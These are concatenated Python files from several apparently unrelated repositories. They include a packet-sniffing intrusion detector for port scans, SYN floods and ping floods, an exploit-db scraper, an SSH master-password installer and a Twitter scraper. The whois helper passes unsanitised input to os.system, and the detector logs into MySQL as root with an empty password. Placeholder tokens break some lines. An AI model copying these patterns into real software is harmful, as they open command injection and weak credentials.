global s_mac
global d_mac
global set_block
global db
global cursor
processed_packets=0
set_block= set()
set_icmp_s_addr=set()
set_port_nos=set()
set_ping_of_death_s_addr=set()
set_smurf_s_addr=set()
set_ddos=set()
s_no_alerts=0
s_no_logs=0
start_sync_flood_timer = default_timer()
start_ddos_timer=default_timer()
duration_sync_flood=0
duration_ddos=0
nmap_s_addr=""
nmap_s_mac=""
def main(self):
print "parse main"
global processed_packets
global db,cursor
# Open database connection
db = MySQLdb.connect("localhost","root","","sid" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
print "conn estd"
while(True):
# pass
if(capture.total_packets==processed_packets):
print "in sleep"
time.sleep(2)
print "parse while"
if(capture.total_packets>processed_packets):
print "capture.total packet = %d" %capture.total_packets
print "processd packet = %d" %processed_packets
#print "dddd",capture.packets[0]
#print "length of packt",len(capture.packets)
parse_packet(capture.packets[processed_packets])
#capture.packets=capture.packets[processed_packets:]
processed_packets=processed_packets+1
print "processd packets = %d"%processed_packets
def parse_packet(packet):
#print packet
#parse ethernet header
print "set_port_nos=%s" %set_port_nos
global iph_length,s_mac,d_mac,set_block,nmap_s_addr,set_smurf_s_addr
global temp, start_sync_flood_timer,start_ddos_timer,s_no_alerts,nmap_s_mac,s_no_logs
eth_length = 14
eth_header = packet[:eth_length]
eth = unpack('!6s6sH' , eth_header)
eth_protocol = socket.ntohs(eth[2])
s_mac=eth_addr(packet[6:12])
d_mac=eth_addr(packet[0:6])
print 'Destination MAC : ' + d_mac + ' Source MAC : ' + s_mac + ' Protocol : ' + str(eth_protocol)
"""
duration_sync_flood = default_timer() - start_sync_flood_timer
print "default_timer()=%s"%default_timer()
print "start_sync_flood_timer=%s"%start_sync_flood_timer
print "duration_sync_flood=%s" %duration_sync_flood
"""
#Parse IP packets, IP Protocol number = 8
if eth_protocol == 8 :
print "sadfd"
#Parse IP header
#take first 20 characters for the ip header
ip_header = packet[eth_length:20+eth_length]
#now unpack them :)
iph = unpack('!BBHHHBBH4s4s' , ip_header)
version_ihl = iph[0]
version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
print "length====",iph_length
ttl = iph[5]
global protocol
global s_addr
global d_addr, no_syn_ack_packets, no_ack_packets
global flag, no_syn_packets
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8]);
d_addr = socket.inet_ntoa(iph[9]);
print 'Version : ' + str(version) + ' IP Header Length : ' + str(ihl) + ' TTL : ' + str(ttl) + ' Protocol : ' + str(protocol) + ' Source Address : ' + str(s_addr) + ' Destination Address : ' + str(d_addr)
duration_sync_flood = default_timer() - start_sync_flood_timer
print "default_timer()=%s"%default_timer()
print "start_sync_flood_timer=%s"%start_sync_flood_timer
print "duration_sync_flood=%s" %duration_sync_flood
print "set_port_nos=%s" %set_port_nos
print "len(set_port_nos)%d"%len(set_port_nos)
if(duration_sync_flood>10):
start_sync_flood_timer=default_timer()
print "capture.no_ack_packets=%s " %capture.no_ack_packets
print "capture.no_syn_packets=%s" %capture.no_syn_packets
#print "len(set_port_nos)%d"%len(set_port_nos)
#print "len(set_port_nos)=%s"%len(set_port_nos)
if(len(set_port_nos)>100):
alerts.insert(nmap_s_addr,nmap_s_mac,"Port Scanning", "NMAP","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Port Scanning","NMAP",nmap_s_addr,nmap_s_mac,"Medium")
print "nmap sourceaddre=%s"%nmap_s_addr
set_block.add((nmap_s_addr,"tcp"))
set_port_nos.clear()
print "nmap block ips",set_block
if(capture.no_ack_packets<(capture.no_syn_packets*0.75) and len(set_port_nos)==1 and capture.no_syn_packets>300 ):
alerts.insert(s_addr,s_mac,"Flooding of sync packet", "TCP Sync Flood","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Flooding of sync packet","TCP Sync Flood",s_addr,s_mac,"Medium")
set_port_nos.clear()
set_block.add((s_addr,"tcp"))
# set_block.append((s_addr,source_port))
#TCP protocol
if protocol == 6 :
print "=================================TCP===================="
t = iph_length + eth_length
tcp_header = packet[t:t+20]
#now unpack them :)
tcph = unpack('!HHLLBBHHH' , tcp_header)
source_port = tcph[0]
dest_port = tcph[1]
sequence = tcph[2]
acknowledgement = tcph[3]
doff_reserved = tcph[4]
print "=========================offset===================="
print doff_reserved.__sizeof__
tcph_length = doff_reserved >> 4
print "=========================tcph[5]==============="
#print bin(tcph[5])
#print tcph[5]
print "=====================tcp_syn value=============="
"""
if(duration>=10):
start = default_timer()
if(no_syn_packets>100):
print "syn flood"
tcp_syn=tcph[5] & 2
if(tcp_syn==2):
print "sync packet detected "
no_syn_packets=no_syn_packets+1
print "no of syn pack=%d"%no_syn_packets
duration = default_timer() - start
print "duration=%d"%duration
"""
tcp_syn=tcph[5] & 2
tcp_syn_ack=tcph[5] & 18
tcp_ack=tcph[5] & 16
if(tcp_syn==2):
capture.no_syn_packets=capture.no_syn_packets+1
print "sync packet detected "
print "dest_port=%s" %dest_port
set_port_nos.add(dest_port)
nmap_s_addr=s_addr
nmap_s_mac=s_mac
print "qqqqqqqqqqqqqqqqqs_addr=%s"%s_addr
if(tcp_syn==18):
print "sync n ack packet detected "
capture.no_syn_ack_packets=capture.no_syn_ack_packets+1
if(tcp_syn==16):
print "ack packet detected "
capture.no_ack_packets=capture.no_ack_packets+1
print "no of syn pack=%d"%capture.no_syn_packets
#block=(s_addr,source_port)
if(dest_port==21):
if(logs.flag==99):
logs.insert("FTP",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"FTP",str(len(packet)),"")
#set_block.add((s_addr,source_port))
#print "display block",set_block
if(dest_port==25 ):
if(logs.flag==99):
logs.insert("SMTP",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"SMTP",str(len(packet)),"")
if(dest_port==53 ):
if(logs.flag==99):
logs.insert("DNS",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"DNS",str(len(packet)),"")
if(dest_port==443 ):
if(logs.flag==99):
logs.insert("HTTPS",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"HTTPS",str(len(packet)),"")
if(dest_port==22 ):
if(logs.flag==99):
logs.insert("SSH",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"SSH",str(len(packet)),"")
if(dest_port==23 ):
if(logs.flag==99):
logs.insert("TELNET",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"TELNET",str(len(packet)),"")
print "set block",set_block
print 'Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) + ' TCP header length : ' + str(tcph_length)
h_size = eth_length + iph_length + tcph_length * 4
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print 'Data : ' + data
#ICMP Packets
elif protocol == 1 :
print "==========================ICMP==========================="
#set_icmp_s_addr.add(s_addr)
#print "set_icmp_s_addr=%s"%set_icmp_s_addr
u = iph_length + eth_length
icmph_length = 4
icmp_header = packet[u:u+4]
#now unpack them :)
icmph = unpack('!BBH' , icmp_header)
icmp_type = icmph[0]
code = icmph[1]
checksum = icmph[2]
print 'Type : ' + str(icmp_type) + ' Code : ' + str(code) + ' Checksum : ' + str(checksum)
h_size = eth_length + iph_length + icmph_length
print "SIZE OF PACKET",len(packet)
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print "icmp data= %s"%data
#print "data[52]",data[52]
if icmp_type==8:
set_icmp_s_addr.add((s_addr,s_mac))
if logs.flag==99:
if icmp_type==8:
print "icmp req"
if(data.find('abcdefghijklmnopqrtuvw') and len(packet)==74):
logs.insert("ICMP Request",len(packet),"Windows Ping")
s_no_logs=s_no_logs+1
#db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Request",str(len(packet)),"Windows Ping")
db_load.pyd_db_logs("","","","","","","","","","")
elif (data.find('01234567') and len(packet)==98):
logs.insert("ICMP Request",len(packet),"Linux Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Request",str(len(packet)),"Linux Ping")
if(icmp_type==0 ):
print "icmp rep"
if(data.find('abcdefghijklmnopqrtuvw') and len(packet)==74):
logs.insert("ICMP Reply",len(packet),"Windows Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Reply",str(len(packet)),"Windows Ping")
elif (data.find('01234567') and len(packet)==98):
logs.insert("ICMP Reply",len(packet),"Linux Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Reply",str(len(packet)),"Linux Ping")
if(alerts.flag==99):
if(d_addr.find('255')!=-1):
print d_addr.find('255')
if(s_addr not in set_smurf_s_addr):
alerts.insert(s_addr,s_mac,"Smurf attack","Smurf attack","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"","Smurf attack",s_addr,s_mac,"Medium")
set_smurf_s_addr.add(s_addr)
for s_smurf in set_smurf_s_addr:
set_block.add((s_smurf,"icmp"))
if(len(packet)!=74 and len(packet)!=98 and icmp_type==8):
if(s_addr not in set_ping_of_death_s_addr):
alerts.insert(s_addr,s_mac,"ICMP Tampered Packet","Ping of Death","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"ICMP Tampered Packet","Ping of Death",s_addr,s_mac,"Medium")
set_ping_of_death_s_addr.add(s_addr)
for s_ping in set_ping_of_death_s_addr:
set_block.add((s_ping,"icmp"))
duration_ddos = default_timer() - start_ddos_timer
print "duration_ddos=%s"%duration_ddos
print "default_timer=%s"%default_timer()
if(duration_ddos>5):
start_ddos_timer=default_timer()
print "set_icmp_s_addr=%s"%set_icmp_s_addr
if(len(set_icmp_s_addr)>=4 ):
for s in set_icmp_s_addr:
alerts.insert(s[0],s[1],"Possible DDos","DDos","Severe")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Ping from different IPs","DDos",s_addr,s_mac,"Severe")
set_block.add((s,"icmp"))
#set_icmp_s_addr.clear()
print 'Data : ' + data
#UDP packets
elif protocol == 17 :
u = iph_length + eth_length
udph_length = 8
udp_header = packet[u:u+8]
#now unpack them :)
udph = unpack('!HHHH' , udp_header)
source_port = udph[0]
dest_port = udph[1]
length = udph[2]
checksum = udph[3]
print 'Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum)
h_size = eth_length + iph_length + udph_length
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print 'Data : ' + data
#some other IP packet like IGMP
else:
print 'Protocol other than TCP/UDP/ICMP'
print
else:
print "========================================================other than ip"
def eth_addr (a) :
b = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (ord(a[0]) , ord(a[1]) , ord(a[2]), ord(a[3]), ord(a[4]) , ord(a[5]))
return b
```
#### File: 0x0mar/PyDetector/temp2.py
```python
from time import sleep
import threading
from Tkinter import *
serialdata = []
data = True
class SensorThread(threading.Thread):
def run(self):
try:
i = 0
while True:
serialdata.append("Hello %d" % i)
i += 1
sleep(1)
except KeyboardInterrupt:
exit()
class Gui(object):
def __init__(self):
self.root = Tk()
self.lbl = Label(self.root, text="")
self.updateGUI()
self.readSensor()
def run(self):
self.lbl.pack()
self.lbl.after(1000, self.updateGUI)
self.root.mainloop()
def updateGUI(self):
msg = "Data is True" if data else "Data is False"
self.lbl["text"] = msg
self.root.update()
self.lbl.after(1000, self.updateGUI)
def readSensor(self):
self.lbl["text"] = serialdata[-1]
self.root.update()
self.root.after(527, self.readSensor)
if __name__ == "__main__":
SensorThread().start()
Gui().run()
```
#### File: 0x0mar/PyDetector/tmp.py
```python
import Tkinter
from Tkinter import *
root = Tk()
status =Label(root, text="Working")
status.grid()
def update_status():
# Get the current message
current_status = status["text"]
# If the message is "Working...", start over with "Working"
if current_status.endswith("..."): current_status = "Working"
# If not, then just add a "." on the end
else: current_status += "."
# Update the message
status["text"] = current_status
# After 1 second, update the status
root.after(1000, update_status)
# Launch the status message after 1 millisecond (when the window is loaded)
root.after(1, update_status)
root.mainloop()
``` |
{
"source": "0x0mar/Scavenger",
"score": 3
} |
#### File: 0x0mar/Scavenger/ExploitDB.py
```python
from shodan import WebAPI #shodan API requirements
from bs4 import BeautifulSoup as BS
import whois
import sys
import urllib
import os
class ExploitDB:
#Function table
#Purpose: this is used in the srchExploitDB function to parse out the links and the exploit name
def table(x):
if x:
return x.startswith("list_explot_description") and not "class2 " in x #class2 was stolen from an example, we need a string argument there, may be replaced in future for something more relavent.
else:
return False
#Function srchExploitDB
#Purpose: Search and display the first ten pages of exploits for user defined search terms.
def srchExploitDB(srchTerm):
num = 1 # used as counter for first printing 10 pages
#TODO: Better parsing of strings.
for num in range (1,10,1): # Printing first ten pages from exploit-db
response = urllib.urlopen('http://www.exploit-db.com/search/?action=search&filter_page=' +str(num) +'&filter_description='+ srchTerm +'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=')
soup = BS(response)
rows = soup.findAll('td', {'class': table}) #
for row in rows:
print row
num += 1
#Function whoisSrch
#Purpose: performing who is searches
def whoisSrch():
site = raw_input('Enter IP or URL: ')
result = os.system('whois '+ site) #The native whois search provides more data than any python modules I have found
print result
``` |
{
"source": "0x0ptim0us/sshmp",
"score": 3
} |
#### File: 0x0ptim0us/sshmp/sshmp_mgr.py
```python
import shutil
import hashlib
import sys
import os
import getpass
import readline
import sqlite3
import optparse
readline.parse_and_bind("tab: complete")
__version__ = "0.1 BETA"
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
if sys.version_info[0] < 3:
print("Must be using Python 3.x")
sys.exit()
def print_with_check(msg):
"""print success messages"""
print(f"✓ {msg}")
def print_with_error(msg):
"""print fail messages"""
print(f"✗ {msg}")
def print_with_info(msg):
"""print informations"""
print(f"☛ {msg}")
def print_header():
header = r"""
__________ __ ____ _______
/ ___/ ___// / / / |/ / __ \
\__ \\__ \/ /_/ / /|_/ / /_/ /
___/ /__/ / __ / / / / ____/
/____/____/_/ /_/_/ /_/_/
SSH Master Password
"""
print(header)
def auth(dbs):
"""
Authorizing users for removing SSHMP or changing password
:param db:
:return:
"""
password = getpass.getpass("Enter master password: ")
password = password.strip("\n")
username = getpass.getuser()
try:
db = sqlite3.connect(dbs)
except:
print("[!] Database not found! exiting ...")
sys.exit(0)
cursor = db.cursor()
cursor.execute("""SELECT password FROM users WHERE username = ?""", (username,))
real_password = cursor.fetchone()
hashed_password = hashlib.sha256(password.encode())
if hashed_password.hexdigest() == real_password[0]:
db.close()
return True
else:
db.close()
return False
class CheckSystemDependencies(object):
def __init__(self):
"""
check system information and dependencies for installing sshmp
suck as :
python executable path location
logged user home directory
old version of sshmp if exists
generate rc,database,sshmp files and directories
"""
self.python_executable_path = sys.executable
self.current_user = getpass.getuser()
self.current_user_home = os.path.expanduser(f"~{self.current_user}")
self.current_pwd = <PASSWORD>()
self.old_version_exist = self.check_old_versions()
self.app_dir = os.path.join(self.current_user_home, ".sshmp")
self.db_loc = os.path.join(self.app_dir, "passwd.db")
self.ssh_directory = os.path.join(self.current_user_home, ".ssh")
self.rc_file = os.path.join(self.ssh_directory, "rc")
def good_to_go(self):
"""
Init installer
:return:
"""
# call header
print_header()
# everything is ok, call installer
self.print_system_checks()
if self.old_version_exist == "False":
res = input("☛ Process? <y/n>")
if res.strip("\n") == "y":
InstallSSHMP()
else:
print("Bye!")
else:
print_with_info("Some version of SSHMP already installed!")
print_with_info("Use --uninstall switch for uninstall existing version!")
sys.exit()
def print_system_checks(self):
"""
print information about installation process
:return:
"""
print_with_check(f"Installing SSHMP for {self.current_user}")
print_with_check(f"User home directory: {self.current_user_home}")
print_with_check(f"Python executable path: {self.python_executable_path}")
print_with_check(f"Old version exists: {self.old_version_exist}")
print_with_check(f"SSHMP installation directory: {self.app_dir}")
print_with_check(f"SSHMP database location: {self.db_loc}")
def check_old_versions(self):
"""
check old version of sshmp
:return:
"""
ssh_rc = os.path.join(self.current_user_home, ".ssh/rc")
try:
rc_file = open(ssh_rc, "r").read()
except FileNotFoundError:
return "False"
else:
# there is old version
if "sshmp.py" in rc_file:
return "True"
else:
return "False"
class InstallSSHMP(CheckSystemDependencies):
def __init__(self):
"""
start installation process
"""
super().__init__()
self.db = ""
password1 = getpass.getpass("-> Enter master password: ")
password2 = getpass.getpass("-> Confirm password: ")
# compare 2 password inserted by user
if password1.strip("\n") == password2.strip("\n"):
self.clean_confirmed_password = password1.strip("\n")
# generate SHA256 hash from password
hashed_password = hashlib.sha256(self.clean_confirmed_password.encode())
hashed_password_hexdigest = hashed_password.hexdigest()
# create directory
self.create_directory_for_installation(app_dir=self.app_dir, ssh_directory=self.ssh_directory)
# create database for user
self.create_database(ssh_directory=self.ssh_directory, app_dir=self.app_dir, db_loc=self.db_loc)
# add username and password to database
self.insert_into_database(username=self.current_user, hashed_password=<PASSWORD>_password_hexdigest)
# create rc file
self.create_rc_file(app_dir=self.app_dir, rc=self.rc_file)
print_with_check(f"SSH Master Password successfully enabled for {self.current_user}")
print_with_check("Please reload/restart sshd service for taking effects")
# if password did't match
else:
# if password did't match call installer again
print_with_error("Password did not match, try again!")
InstallSSHMP()
def create_directory_for_installation(self, app_dir, ssh_directory):
"""
create directory for SSHMP
:return:
"""
try:
# create .sshmp directory in user home folder
os.mkdir(app_dir)
except FileExistsError:
print_with_error("SSHMP Folder is exist!")
try:
os.mkdir(ssh_directory)
except FileExistsError:
print_with_error(".ssh Folder is exist!")
def create_database(self, ssh_directory, app_dir, db_loc):
"""Create database"""
try:
# connect to Sqlite database
self.db = sqlite3.connect(db_loc)
except Exception as e:
print_with_error(f"Error: {e}")
sys.exit()
self.cursor = self.db.cursor()
try:
# create `users` table if not exists
self.cursor.execute('''CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)''')
except Exception as e:
print_with_info(f"WARNING: Database is exists!")
# check if database file exist
if os.path.exists(db_loc):
print_with_check("Database created successfully.")
def insert_into_database(self, username, hashed_password):
"""
insert into database
:return:
"""
try:
self.cursor.execute('''INSERT INTO users(username, password) VALUES(?,?)''', (username, hashed_password))
except:
print_with_info("☛ WARNING: User already exists!")
sys.exit()
finally:
self.db.commit()
def create_rc_file(self, app_dir, rc):
"""
create rc file
:return:
"""
# copy sshmp.py to the location
copy_location = os.path.join(app_dir, 'sshmp.py')
copy_manager = os.path.join(app_dir, 'sshmp_mgr.py')
shutil.copy("sshmp.py", copy_location)
shutil.copy("sshmp_mgr.py", copy_manager)
try:
os.symlink(copy_manager, "/usr/local/bin/sshmpmgr")
print_with_check("Symlink created successfully. run sshmpmgr --help for more info.")
except:
print_with_error("Creating symlink failed!")
print_with_check("SSHMP files copied.")
# add execute command in rc file
try:
rc_file = open(rc, "w")
except Exception as e:
print(e)
print_with_error("Couldn't create rc file, exiting...")
sys.exit()
else:
sshmp_file = os.path.join(app_dir, "sshmp.py")
command = f"{self.python_executable_path} {sshmp_file}"
rc_file.write(f"{command}\n")
rc_file.close()
print_with_check("The rc file created successfully.")
class UninstallSSHMP(CheckSystemDependencies):
def __init__(self):
"""Uninstall process"""
super().__init__()
def uninstall(self):
# file path of database and sshmp.py
app_file = os.path.join(self.app_dir, "sshmp.py")
app_database = os.path.join(self.app_dir, "passwd.db")
# if authorize
if auth(app_database):
# remove command from rc file
if os.path.exists(self.rc_file):
try:
rc = open(self.rc_file, "r+")
lines = rc.readlines()
rc.seek(0)
for line in lines:
if "sshmp.py" not in line:
rc.write(line)
rc.truncate()
except FileNotFoundError:
print_with_error("The rc file not found!")
sys.exit()
# remove sshmp.py if exist
if os.path.exists(app_file):
os.remove(app_file)
# remove passwd.db file if exists
if os.path.exists(app_database):
os.remove(app_database)
# remove symlink
if os.path.exists("/usr/local/bin/sshmpmgr"):
os.remove("/usr/local/bin/sshmpmgr")
print_with_check("SSHMP removed successfully!")
print_with_info("Please reload/restart sshd service for taking effects")
else:
# if user not authorized then exit
print_with_error("Operation not permitted!")
sys.exit()
class Configuration(CheckSystemDependencies):
def __init__(self):
super().__init__()
if auth(self.db_loc):
res = input(f"☛ Do you want to change password for [{self.current_user}]? <y/n>: ")
if res.strip("\n") == "y":
self.change_password()
else:
sys.exit()
def change_password(self):
"""
Change password for current user
:return:
"""
password1 = getpass.getpass("-> New password: ")
password2 = getpass.getpass("-> Confirm password: ")
# compare 2 password inserted by user
if password1.strip("\n") == password2.strip("\n"):
self.clean_confirmed_password = password1.strip("\n")
# generate SHA256 hash from password
hashed_password = hashlib.sha256(self.clean_confirmed_password.encode())
hashed_password_hexdigest = hashed_password.hexdigest()
# update password
try:
db = sqlite3.connect(self.db_loc)
cursor = db.cursor()
cursor.execute('''UPDATE users SET password = ? WHERE username = ?''',(hashed_password_hexdigest, self.current_user))
db.commit()
print_with_check(f"Password updated for {self.current_user}")
except Exception as e:
print_with_error(f"Something wrong! : {e}")
sys.exit()
if __name__ == "__main__":
"""Controll switchs"""
parser = optparse.OptionParser()
parser.add_option("-i", "--install", action="store_const", const="install", dest="element", help="Install SSHMP for current user")
parser.add_option("-u", "--uninstall", action="store_const", const="uninstall", dest="element", help="Remove SSHMP if exists")
parser.add_option("-m" ,"--manage", action="store_const", const="manage", dest="element", help="Change password and settings")
options, args = parser.parse_args()
if options.element == "install":
CheckSystemDependencies().good_to_go()
elif options.element == "uninstall":
UninstallSSHMP().uninstall()
elif options.element == "manage":
Configuration()
else:
print_with_error("Use with --help for more info.")
sys.exit()
``` |
{
"source": "0x0ptim0us/twpy",
"score": 2
} |
#### File: twpy/core/grabber.py
```python
import time
from datetime import datetime
from ..exceptions import QueryError, ParameterRequired
from .request import RequestHandler
from ..config.config import BASE_URL, MOBILE_URL, TIMELINE_WITH_TOKEN_QUERY, APIV1_URL
from ..utils import extract_cursor, extract_ff, extract_timeline_cursor, extract_timeline, extract_profile
from time import sleep
def follower_following(
username: str, limit: int = 0,
type_: str = "followers",
proxy: str = None,
interval: int = 0) -> list:
"""
Followers/Followings scraper
:param username:
:param limit:
:param type_:
:param proxy:
:param interval:
:return:
"""
result: list = []
cursor: str = str()
first_request: bool = True
has_more: bool = True
# mode = FF -> followers/followings user-agent
req = RequestHandler(user_agent="FF")
# if proxy enabled set it
if proxy:
req.proxy = proxy
while has_more:
if first_request:
url = MOBILE_URL + f"/{username}/{type_}/?lang=en"
res = req.get(url)
first_request = False
else:
url = MOBILE_URL + f"/{username}/{type_}/?lang=en&cursor={cursor}"
res = req.get(url)
if res:
# extract cursor
cursor = extract_cursor(res)
if cursor:
has_more = True
else:
has_more = False
# parse followers/followings
extracted_ff = extract_ff(res)
result.extend(extracted_ff)
# if there was limit
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
return result
# interval
sleep(interval)
return result
def timeline(username: str, limit: int = 0, proxy: str = None, interval: int = 0) -> list:
"""
timeline scraper
:param username:
:param limit:
:param proxy:
:param interval:
:return:
"""
result: list = []
cursor = "-1"
has_more = True
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
while has_more:
url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY+f"+from:{username}"
url = url.replace("%TOKEN%", cursor)
res = req.get(url)
if res:
cursor, has_more = extract_timeline_cursor(response=res)
extracted_tweets = extract_timeline(res['items_html'])
result.extend(extracted_tweets)
# check limitation
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
return result
sleep(interval)
return result
def profile(username: str, proxy: str):
"""
get user profile
"""
req = RequestHandler(user_agent="MOBILE")
if proxy:
req.proxy = proxy
url = BASE_URL+username+"/?lang=en"
res = req.get(url=url)
if res:
return extract_profile(res)
else:
return None
def get_user_id(username: str, proxy: str):
"""
get user id
"""
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
url = APIV1_URL + username
res = req.get(url=url)
if res:
return res.get('user_id', '')
else:
return ''
def search(username: str = "", since: str = "", until: str = "", query: str = "", limit: int = 0, verified: bool = False, proxy: str = "", interval: int = 0):
"""Advanced search engine"""
cursor: str = "-1"
has_more: bool = True
result: list = []
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
if since:
since = int(time.mktime(datetime.strptime(since, "%Y-%m-%d").timetuple()))
if until:
if len(until) == 4:
until = f"{until}-01-01"
query_structure = {
"from": f"+from:{username}",
"since": f"+since:{since}",
"verified": ":verified",
"until": f"+until:{until}",
"query": f"+{query}"
}
if username and query:
""" not allowed """
raise QueryError("`username` and `query` parameter not allowed together.")
if since and until:
""" not allowed """
raise QueryError("`since` and `until` parameter not allowed together.")
url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY
url = url.replace("%TOKEN%", cursor)
# if there was username or query
if username or query:
if username:
url += query_structure['from']
else:
url += query_structure['query']
# if username and query aren't set properly raise error
else:
raise ParameterRequired("`username` or `query` required for search.")
if since or until:
if since:
url += query_structure['since']
elif until:
url += query_structure['until']
if verified:
url += query_structure['verified']
while has_more:
res = req.get(url=url)
if res:
cursor, has_more = extract_timeline_cursor(response=res)
if cursor:
extracted_tweets = extract_timeline(res['items_html'])
result.extend(extracted_tweets)
url = url.replace("%TOKEN%", cursor)
# check limitation
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
break
sleep(interval)
else:
return result
return result
```
#### File: twpy/serializers/__to_list.py
```python
def to_list(objects_list: list) -> list:
"""
Get objects and convert it to list
:param objects_list:
:return:
"""
try:
if objects_list[0].__class__.__name__ == "FF":
return [[obj.username, obj.avatar, obj.fullname] for obj in objects_list]
elif objects_list[0].__class__.__name__ == "Timeline":
return [[
obj.tweet_id,
obj.tweet_link,
obj.conversation_id,
obj.is_reply,
obj.has_parent,
obj.screen_name,
obj.user_id,
obj.user_mentions,
obj.content,
obj.reply_count,
obj.retweet_count,
obj.likes_count,
obj.created_at] for obj in objects_list]
elif objects_list[0].__class__.__name__ == "Profile":
return [[
obj.name,
obj.verified,
obj.protected,
obj.username,
obj.bio,
obj.location,
obj.url,
obj.joined_date,
obj.birthday,
obj.user_id,
obj.tweet_count,
obj.following_count,
obj.follower_count,
obj.likes_count
] for obj in objects_list]
except IndexError:
return []
``` |
{
"source": "0x0soir/tensorwine",
"score": 3
} |
#### File: src/char_recognition/extensions.py
```python
import io
import math
import sys
import inspect
import re
import os
import numpy as np
from random import randint
from random import random as _random
import shutil
py2 = sys.version < '3'
py3 = sys.version >= '3'
true = True
false = False
pi = math.pi
E = math.e
def Max(a, b):
if a > b:
return a
return b
def Min(a, b):
if a > b:
return b
return a
def rand(n=1): return _random() * n
def random(n=1): return _random() * n
def random_array(l): return np.random.rand(l) # (0,1) x,y don't work ->
def random_matrix(x, y): return np.random.rand(x, y) # (0,1) !
def pick(xs):
return xs[randint(len(xs))]
def readlines(source):
print("open(source).readlines()")
return map(str.strip, open(source).readlines())
def reverse(x):
y = x.reverse()
return y or x
def h(x):
help(x)
def log(msg):
print(msg)
def fold(self, x, fun):
if not callable(fun):
fun, x = x, fun
return reduce(fun, self, x)
def last(xs):
return xs[-1]
def Pow(x, y):
return x**y
def is_string(s):
return isinstance(s, str) or isinstance(s, xstr) or isinstance(s, unicode)
def flatten(l):
if isinstance(l, list) or isinstance(l, tuple):
for k in l:
if isinstance(k, list):
l.remove(k)
l.append(*k)
else:
return [l]
return l
def square(x):
if isinstance(x, list): return map(square, x)
return x * x
def puts(x):
print(x)
return x
def increase(x):
import nodes
if isinstance(x, nodes.Variable):
x.value = x.value + 1
return x.value
return x + 1
def grep(xs, x):
if isinstance(x, list):
return filter(lambda y: x[0] in str(y), xs)
return filter(lambda y: x in str(y), xs)
def ls(mypath="."):
from extensions import xlist
